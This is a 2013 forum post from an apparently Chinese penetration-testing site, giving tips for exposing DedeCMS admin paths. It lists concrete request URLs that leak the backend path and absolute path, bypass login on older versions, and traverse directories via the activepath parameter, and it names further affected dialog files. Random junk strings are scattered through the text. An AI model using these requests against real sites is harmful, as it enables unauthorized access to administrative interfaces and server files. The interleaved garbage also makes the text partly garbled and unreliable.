中国网络渗透测试联盟

标题: dedecms爆后台文件技巧 [打印本页]

作者: admin    时间: 2013-4-16 16:50
标题: dedecms爆后台文件技巧
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理2 x/ h3 x  L0 x
: u5 J- k  j0 t8 m: B
员帐号,新版本的就直接转向了后台.  b0 x: [  J& L

6 G# t; d8 T/ \; E/ y: ~( q. @2.include/dialog/config.php会爆出后台管理路径
+ ~5 B5 Q4 h8 H( D( M& E4 \" G! d' P' i& ^4 c' T
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录0 D6 Y0 z' X' ?7 h6 `

! x& d" u/ n- Y5 f/ ?4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
7 h; P! d* H! K- K4 K- |/ s6 Y( |4 E+ [( a
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
, _4 s# B. B$ h1 }
' y( W( e; Y$ L+ p到根目录去.不过这些版本的访问地址有些不同.- I) [4 n' _+ O/ ?0 h+ P
地址为require/dialog/select_soft.php?activepath=/././././././././  P  p# ?# M; g+ Y! T( E& i% q! u, w
- Z$ V5 |* L# H
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
) H/ s3 [4 J$ h8 A) I" \; C存在相同问题的文件还有
/ r; C4 b) n  ^$ finclude\dialog\select_images.php
/ Q) ~3 C7 ~5 r, i$ kinclude\dialog\select_media.php
6 `% |6 c- W6 D- C0 v  ninclude\dialog\select_templets.php​2 M% m! u7 `2 |





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2